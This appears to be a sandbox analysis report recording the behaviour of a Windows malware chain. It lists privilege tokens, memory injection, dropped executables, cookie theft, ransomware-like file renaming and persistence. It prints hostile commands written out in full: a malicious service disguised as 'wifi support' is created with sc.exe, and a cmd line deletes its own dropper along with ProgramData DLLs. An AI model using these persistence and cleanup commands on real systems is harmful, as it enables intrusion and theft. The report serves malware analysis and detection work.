Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeDebugPrivilege	1556	937D.exe
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeManageVolumePrivilege	3772	B24.exe
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeDebugPrivilege	2256	1075474_ah_hot_iconçè_)))_.exe
Token: SeCreateTokenPrivilege	3780	2596.exe
Token: SeAssignPrimaryTokenPrivilege	3780	2596.exe
Token: SeLockMemoryPrivilege	3780	2596.exe
Token: SeIncreaseQuotaPrivilege	3780	2596.exe
Token: SeMachineAccountPrivilege	3780	2596.exe
Token: SeTcbPrivilege	3780	2596.exe
Token: SeSecurityPrivilege	3780	2596.exe
Token: SeTakeOwnershipPrivilege	3780	2596.exe
Token: SeLoadDriverPrivilege	3780	2596.exe
Token: SeSystemProfilePrivilege	3780	2596.exe
Token: SeSystemtimePrivilege	3780	2596.exe
Token: SeProfSingleProcessPrivilege	3780	2596.exe
Token: SeIncBasePriorityPrivilege	3780	2596.exe
Token: SeCreatePagefilePrivilege	3780	2596.exe
Token: SeCreatePermanentPrivilege	3780	2596.exe
Token: SeBackupPrivilege	3780	2596.exe
Token: SeRestorePrivilege	3780	2596.exe
Token: SeShutdownPrivilege	3780	2596.exe
Token: SeDebugPrivilege	3780	2596.exe
Token: SeAuditPrivilege	3780	2596.exe
Token: SeSystemEnvironmentPrivilege	3780	2596.exe
Token: SeChangeNotifyPrivilege	3780	2596.exe
Token: SeRemoteShutdownPrivilege	3780	2596.exe
Token: SeUndockPrivilege	3780	2596.exe
Token: SeSyncAgentPrivilege	3780	2596.exe
Token: SeEnableDelegationPrivilege	3780	2596.exe
Token: SeManageVolumePrivilege	3780	2596.exe
Token: SeImpersonatePrivilege	3780	2596.exe
Token: SeCreateGlobalPrivilege	3780	2596.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

irecord.tmp

pid process

4300 irecord.tmp

pid	process
4300	irecord.tmp

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

8F36.exe908E.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exe

pid	process
2680	8F36.exe
1908	908E.exe
3016
4464	MicrosoftEdge.exe
4404	MicrosoftEdgeCP.exe
4404	MicrosoftEdgeCP.exe
4960	MicrosoftEdge.exe
6932	MicrosoftEdgeCP.exe
6932	MicrosoftEdgeCP.exe
5648	MicrosoftEdge.exe
4436	MicrosoftEdgeCP.exe
4436	MicrosoftEdgeCP.exe

Suspicious use of UnmapMainImage 1 IoCs

Processes:

pid process

3016

pid	process
3016

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

toolspab2 (16).exe937D.exe

description	pid	process	target process
PID 3948 wrote to memory of 208	3948	toolspab2 (16).exe	toolspab2 (16).exe
PID 3948 wrote to memory of 208	3948	toolspab2 (16).exe	toolspab2 (16).exe
PID 3948 wrote to memory of 208	3948	toolspab2 (16).exe	toolspab2 (16).exe
PID 3948 wrote to memory of 208	3948	toolspab2 (16).exe	toolspab2 (16).exe
PID 3948 wrote to memory of 208	3948	toolspab2 (16).exe	toolspab2 (16).exe
PID 3948 wrote to memory of 208	3948	toolspab2 (16).exe	toolspab2 (16).exe
PID 3016 wrote to memory of 2680	3016		8F36.exe
PID 3016 wrote to memory of 2680	3016		8F36.exe
PID 3016 wrote to memory of 2680	3016		8F36.exe
PID 3016 wrote to memory of 1908	3016		908E.exe
PID 3016 wrote to memory of 1908	3016		908E.exe
PID 3016 wrote to memory of 1908	3016		908E.exe
PID 3016 wrote to memory of 1500	3016		937D.exe
PID 3016 wrote to memory of 1500	3016		937D.exe
PID 3016 wrote to memory of 1500	3016		937D.exe
PID 1500 wrote to memory of 1556	1500	937D.exe	937D.exe
PID 1500 wrote to memory of 1556	1500	937D.exe	937D.exe
PID 1500 wrote to memory of 1556	1500	937D.exe	937D.exe
PID 3016 wrote to memory of 3896	3016		96BB.exe
PID 3016 wrote to memory of 3896	3016		96BB.exe
PID 3016 wrote to memory of 3896	3016		96BB.exe
PID 3016 wrote to memory of 904	3016		98CF.exe
PID 3016 wrote to memory of 904	3016		98CF.exe
PID 3016 wrote to memory of 904	3016		98CF.exe
PID 3016 wrote to memory of 1132	3016		9CE7.exe
PID 3016 wrote to memory of 1132	3016		9CE7.exe
PID 3016 wrote to memory of 1132	3016		9CE7.exe
PID 3016 wrote to memory of 816	3016		A1CA.exe
PID 3016 wrote to memory of 816	3016		A1CA.exe
PID 3016 wrote to memory of 816	3016		A1CA.exe
PID 1500 wrote to memory of 1556	1500	937D.exe	937D.exe
PID 1500 wrote to memory of 1556	1500	937D.exe	937D.exe
PID 1500 wrote to memory of 1556	1500	937D.exe	937D.exe
PID 1500 wrote to memory of 1556	1500	937D.exe	937D.exe
PID 1500 wrote to memory of 1556	1500	937D.exe	937D.exe
PID 3016 wrote to memory of 2440	3016		explorer.exe
PID 3016 wrote to memory of 2440	3016		explorer.exe
PID 3016 wrote to memory of 2440	3016		explorer.exe
PID 3016 wrote to memory of 2440	3016		explorer.exe
PID 3016 wrote to memory of 3712	3016		explorer.exe
PID 3016 wrote to memory of 3712	3016		explorer.exe
PID 3016 wrote to memory of 3712	3016		explorer.exe
PID 3016 wrote to memory of 4036	3016		explorer.exe
PID 3016 wrote to memory of 4036	3016		explorer.exe
PID 3016 wrote to memory of 4036	3016		explorer.exe
PID 3016 wrote to memory of 4036	3016		explorer.exe
PID 3016 wrote to memory of 688	3016		explorer.exe
PID 3016 wrote to memory of 688	3016		explorer.exe
PID 3016 wrote to memory of 688	3016		explorer.exe
PID 3016 wrote to memory of 3936	3016		explorer.exe
PID 3016 wrote to memory of 3936	3016		explorer.exe
PID 3016 wrote to memory of 3936	3016		explorer.exe
PID 3016 wrote to memory of 3936	3016		explorer.exe
PID 3016 wrote to memory of 1704	3016		explorer.exe
PID 3016 wrote to memory of 1704	3016		explorer.exe
PID 3016 wrote to memory of 1704	3016		explorer.exe
PID 3016 wrote to memory of 2284	3016		explorer.exe
PID 3016 wrote to memory of 2284	3016		explorer.exe
PID 3016 wrote to memory of 2284	3016		explorer.exe
PID 3016 wrote to memory of 2284	3016		explorer.exe
PID 3016 wrote to memory of 1004	3016		explorer.exe
PID 3016 wrote to memory of 1004	3016		explorer.exe
PID 3016 wrote to memory of 1004	3016		explorer.exe
PID 3016 wrote to memory of 3784	3016		explorer.exe

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1944

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2760

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2688

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2672

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2408

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2400

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1412

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1332

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1240

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1108

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
- Modifies registry class
PID:412

C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe
C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe --Task
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5072

C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe
C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe --Task
3⤵
- Executes dropped EXE
PID:6496

C:\Users\Admin\AppData\Roaming\cauthjr
C:\Users\Admin\AppData\Roaming\cauthjr
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5388

C:\Users\Admin\AppData\Roaming\cauthjr
C:\Users\Admin\AppData\Roaming\cauthjr
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
PID:2236

C:\Users\Admin\AppData\Roaming\seuthjr
C:\Users\Admin\AppData\Roaming\seuthjr
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
PID:6784

C:\Users\Admin\AppData\Roaming\reuthjr
C:\Users\Admin\AppData\Roaming\reuthjr
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
PID:6984

C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe
C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe --Task
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6060

C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe
C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe --Task
3⤵
- Executes dropped EXE
PID:5924

C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe
C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe --Task
2⤵
- Suspicious use of SetThreadContext
PID:416

C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe
C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe --Task
3⤵
PID:6596

C:\Users\Admin\AppData\Roaming\seuthjr
C:\Users\Admin\AppData\Roaming\seuthjr
2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
PID:5684

C:\Users\Admin\AppData\Roaming\cauthjr
C:\Users\Admin\AppData\Roaming\cauthjr
2⤵
- Suspicious use of SetThreadContext
PID:4532

C:\Users\Admin\AppData\Roaming\cauthjr
C:\Users\Admin\AppData\Roaming\cauthjr
3⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
PID:6176

C:\Users\Admin\AppData\Roaming\reuthjr
C:\Users\Admin\AppData\Roaming\reuthjr
2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
PID:6972

C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe
C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe --Task
2⤵
- Suspicious use of SetThreadContext
PID:6384

C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe
C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe --Task
3⤵
PID:640

C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe
C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe --Task
2⤵
- Suspicious use of SetThreadContext
PID:6364

C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe
C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe --Task
3⤵
PID:3636

C:\Users\Admin\AppData\Roaming\seuthjr
C:\Users\Admin\AppData\Roaming\seuthjr
2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
PID:5928

C:\Users\Admin\AppData\Roaming\cauthjr
C:\Users\Admin\AppData\Roaming\cauthjr
2⤵
- Suspicious use of SetThreadContext
PID:4584

C:\Users\Admin\AppData\Roaming\cauthjr
C:\Users\Admin\AppData\Roaming\cauthjr
3⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
PID:5204

C:\Users\Admin\AppData\Roaming\reuthjr
C:\Users\Admin\AppData\Roaming\reuthjr
2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
PID:6140

C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe
C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe --Task
2⤵
- Suspicious use of SetThreadContext
PID:4884

C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe
C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe --Task
3⤵
PID:1048

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:68

C:\Users\Admin\AppData\Local\Temp\toolspab2 (16).exe
"C:\Users\Admin\AppData\Local\Temp\toolspab2 (16).exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3948

C:\Users\Admin\AppData\Local\Temp\toolspab2 (16).exe
"C:\Users\Admin\AppData\Local\Temp\toolspab2 (16).exe"
2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:208

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Suspicious use of SetThreadContext
PID:720

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies registry class
PID:5140

C:\Users\Admin\AppData\Local\Temp\8F36.exe
C:\Users\Admin\AppData\Local\Temp\8F36.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2680

C:\Users\Admin\AppData\Local\Temp\908E.exe
C:\Users\Admin\AppData\Local\Temp\908E.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1908

C:\Users\Admin\AppData\Local\Temp\937D.exe
C:\Users\Admin\AppData\Local\Temp\937D.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1500

C:\Users\Admin\AppData\Local\Temp\937D.exe
C:\Users\Admin\AppData\Local\Temp\937D.exe
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1556

C:\Users\Admin\AppData\Local\Temp\96BB.exe
C:\Users\Admin\AppData\Local\Temp\96BB.exe
1⤵
- Executes dropped EXE
PID:3896

C:\Users\Admin\AppData\Local\Temp\98CF.exe
C:\Users\Admin\AppData\Local\Temp\98CF.exe
1⤵
- Executes dropped EXE
PID:904

C:\Users\Admin\AppData\Local\Temp\9CE7.exe
C:\Users\Admin\AppData\Local\Temp\9CE7.exe
1⤵
- Executes dropped EXE
PID:1132

C:\Users\Admin\AppData\Local\Temp\A1CA.exe
C:\Users\Admin\AppData\Local\Temp\A1CA.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:816

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2440

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3712

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4036

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:688

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3936

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:1704

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2284

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:1004

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3784

C:\Users\Admin\AppData\Local\Temp\16F.exe
C:\Users\Admin\AppData\Local\Temp\16F.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4084

C:\Users\Admin\AppData\Local\Temp\16F.exe
C:\Users\Admin\AppData\Local\Temp\16F.exe
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Modifies system certificate store
PID:4004

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375" /deny *S-1-1-0:(OI)(CI)(DE,DC)
3⤵
- Modifies file permissions
PID:3560

C:\Users\Admin\AppData\Local\Temp\16F.exe
"C:\Users\Admin\AppData\Local\Temp\16F.exe" --Admin IsNotAutoStart IsNotTask
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4144

C:\Users\Admin\AppData\Local\Temp\16F.exe
"C:\Users\Admin\AppData\Local\Temp\16F.exe" --Admin IsNotAutoStart IsNotTask
4⤵
- Executes dropped EXE
- Modifies extensions of user files
PID:5480

C:\Users\Admin\AppData\Local\c1b666da-42b4-4565-bdbf-0c258e58e563\build2.exe
"C:\Users\Admin\AppData\Local\c1b666da-42b4-4565-bdbf-0c258e58e563\build2.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5916

C:\Users\Admin\AppData\Local\c1b666da-42b4-4565-bdbf-0c258e58e563\build2.exe
"C:\Users\Admin\AppData\Local\c1b666da-42b4-4565-bdbf-0c258e58e563\build2.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:3156

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\c1b666da-42b4-4565-bdbf-0c258e58e563\build2.exe" & del C:\ProgramData\*.dll & exit
7⤵
PID:5540

C:\Windows\SysWOW64\taskkill.exe
taskkill /im build2.exe /f
8⤵
- Kills process with taskkill
PID:4984

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
8⤵
- Delays execution with timeout.exe
PID:4572

C:\Users\Admin\AppData\Local\Temp\B24.exe
C:\Users\Admin\AppData\Local\Temp\B24.exe
1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:3772

C:\Users\Admin\AppData\Local\Temp\E23.exe
C:\Users\Admin\AppData\Local\Temp\E23.exe
1⤵
- Executes dropped EXE
PID:3664

C:\Users\Admin\AppData\Local\Temp\is-K5P5D.tmp\E23.tmp
"C:\Users\Admin\AppData\Local\Temp\is-K5P5D.tmp\E23.tmp" /SL5="$30118,506127,422400,C:\Users\Admin\AppData\Local\Temp\E23.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1248

C:\Users\Admin\AppData\Local\Temp\is-THDNQ.tmp\1075474_ah_hot_iconçè_)))_.exe
"C:\Users\Admin\AppData\Local\Temp\is-THDNQ.tmp\1075474_ah_hot_iconçè_)))_.exe" /S /UID=rec7
3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:2256

C:\Program Files\Windows Multimedia Platform\TLJRVISOCO\irecord.exe
"C:\Program Files\Windows Multimedia Platform\TLJRVISOCO\irecord.exe" /VERYSILENT
4⤵
- Executes dropped EXE
PID:4176

C:\Users\Admin\AppData\Local\Temp\is-ILSV2.tmp\irecord.tmp
"C:\Users\Admin\AppData\Local\Temp\is-ILSV2.tmp\irecord.tmp" /SL5="$20192,5808768,66560,C:\Program Files\Windows Multimedia Platform\TLJRVISOCO\irecord.exe" /VERYSILENT
5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:4300

C:\Program Files (x86)\i-record\I-Record.exe
"C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4904

C:\Users\Admin\AppData\Local\Temp\e4-0123b-326-a1bbe-e5b53587232db\Nasaesypymu.exe
"C:\Users\Admin\AppData\Local\Temp\e4-0123b-326-a1bbe-e5b53587232db\Nasaesypymu.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
PID:4244

C:\Users\Admin\AppData\Local\Temp\b9-b3905-dde-b2cb9-ed412ad4726d1\Mataexupaty.exe
"C:\Users\Admin\AppData\Local\Temp\b9-b3905-dde-b2cb9-ed412ad4726d1\Mataexupaty.exe"
4⤵
- Executes dropped EXE
PID:4340

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xkjyyixe.lts\GcleanerEU.exe /eufive & exit
5⤵
PID:4788

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\d4yt0akv.adi\JoSetp.exe & exit
5⤵
PID:4896

C:\Users\Admin\AppData\Local\Temp\d4yt0akv.adi\JoSetp.exe
C:\Users\Admin\AppData\Local\Temp\d4yt0akv.adi\JoSetp.exe
6⤵
- Executes dropped EXE
PID:4132

C:\Users\Admin\AppData\Roaming\5643095.exe
"C:\Users\Admin\AppData\Roaming\5643095.exe"
7⤵
- Executes dropped EXE
PID:1128

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1128 -s 1616
8⤵
- Program crash
PID:5824

C:\Users\Admin\AppData\Roaming\7440878.exe
"C:\Users\Admin\AppData\Roaming\7440878.exe"
7⤵
- Adds Run key to start application
PID:2300

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
8⤵
PID:4072

C:\Users\Admin\AppData\Roaming\2467453.exe
"C:\Users\Admin\AppData\Roaming\2467453.exe"
7⤵
PID:6076

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2a50f40s.0zb\installer.exe /qn CAMPAIGN="654" & exit
5⤵
PID:4108

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\paj502l2.vha\md6_6ydj.exe & exit
5⤵
PID:2684

C:\Users\Admin\AppData\Local\Temp\paj502l2.vha\md6_6ydj.exe
C:\Users\Admin\AppData\Local\Temp\paj502l2.vha\md6_6ydj.exe
6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:2808

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\adwnijip.k0d\ufgaa.exe & exit
5⤵
PID:4360

C:\Users\Admin\AppData\Local\Temp\adwnijip.k0d\ufgaa.exe
C:\Users\Admin\AppData\Local\Temp\adwnijip.k0d\ufgaa.exe
6⤵
- Executes dropped EXE
PID:1836

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
7⤵
- Executes dropped EXE
PID:5128

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
7⤵
- Executes dropped EXE
PID:5824

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
7⤵
- Executes dropped EXE
PID:4472

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
7⤵
PID:2732

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\skbuwbsr.t2a\google-game.exe & exit
5⤵
PID:4184

C:\Users\Admin\AppData\Local\Temp\skbuwbsr.t2a\google-game.exe
C:\Users\Admin\AppData\Local\Temp\skbuwbsr.t2a\google-game.exe
6⤵
- Executes dropped EXE
PID:5704

C:\Users\Admin\AppData\Local\Temp\skbuwbsr.t2a\google-game.exe
"C:\Users\Admin\AppData\Local\Temp\skbuwbsr.t2a\google-game.exe" -a
7⤵
PID:5916

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\psb1cbnt.ib5\app.exe & exit
5⤵
PID:5308

C:\Users\Admin\AppData\Local\Temp\psb1cbnt.ib5\app.exe
C:\Users\Admin\AppData\Local\Temp\psb1cbnt.ib5\app.exe
6⤵
- Executes dropped EXE
PID:5964

C:\Users\Admin\AppData\Local\Temp\psb1cbnt.ib5\app.exe
"C:\Users\Admin\AppData\Local\Temp\psb1cbnt.ib5\app.exe"
7⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:6728

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ojqxqsmb.jit\askinstall46.exe & exit
5⤵
PID:5728

C:\Users\Admin\AppData\Local\Temp\ojqxqsmb.jit\askinstall46.exe
C:\Users\Admin\AppData\Local\Temp\ojqxqsmb.jit\askinstall46.exe
6⤵
- Executes dropped EXE
PID:6128

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
7⤵
PID:5940

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
8⤵
- Kills process with taskkill
PID:5188

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iqt4f2st.msg\fa041e8b.exe & exit
5⤵
PID:5560

C:\Users\Admin\AppData\Local\Temp\iqt4f2st.msg\fa041e8b.exe
C:\Users\Admin\AppData\Local\Temp\iqt4f2st.msg\fa041e8b.exe
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4264

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\k3uinste.zaz\GcleanerWW.exe /mixone & exit
5⤵
PID:5280

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yxi45bqw.dwu\toolspab1.exe & exit
5⤵
PID:5912

C:\Users\Admin\AppData\Local\Temp\yxi45bqw.dwu\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\yxi45bqw.dwu\toolspab1.exe
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6512

C:\Users\Admin\AppData\Local\Temp\yxi45bqw.dwu\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\yxi45bqw.dwu\toolspab1.exe
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:7012

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kuy13fyr.hfj\app.exe /8-2222 & exit
5⤵
PID:6200

C:\Users\Admin\AppData\Local\Temp\kuy13fyr.hfj\app.exe
C:\Users\Admin\AppData\Local\Temp\kuy13fyr.hfj\app.exe /8-2222
6⤵
- Executes dropped EXE
PID:6776

C:\Users\Admin\AppData\Local\Temp\kuy13fyr.hfj\app.exe
"C:\Users\Admin\AppData\Local\Temp\kuy13fyr.hfj\app.exe" /8-2222
7⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:5876

C:\Users\Admin\AppData\Local\Temp\1C3D.exe
C:\Users\Admin\AppData\Local\Temp\1C3D.exe
1⤵
- Executes dropped EXE
PID:3484

C:\Users\Admin\AppData\Local\Temp\1C3D.exe
"C:\Users\Admin\AppData\Local\Temp\1C3D.exe"
2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Modifies system certificate store
PID:5460

C:\Users\Admin\AppData\Local\Temp\1EAF.exe
C:\Users\Admin\AppData\Local\Temp\1EAF.exe
1⤵
- Executes dropped EXE
PID:3156

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\yvgsetyr\
2⤵
PID:2224

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\zgqwyuzy.exe" C:\Windows\SysWOW64\yvgsetyr\
2⤵
PID:508

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create yvgsetyr binPath= "C:\Windows\SysWOW64\yvgsetyr\zgqwyuzy.exe /d\"C:\Users\Admin\AppData\Local\Temp\1EAF.exe\"" type= own start= auto DisplayName= "wifi support"
2⤵
PID:4024

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description yvgsetyr "wifi internet conection"
2⤵
PID:3028

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start yvgsetyr
2⤵
PID:3476

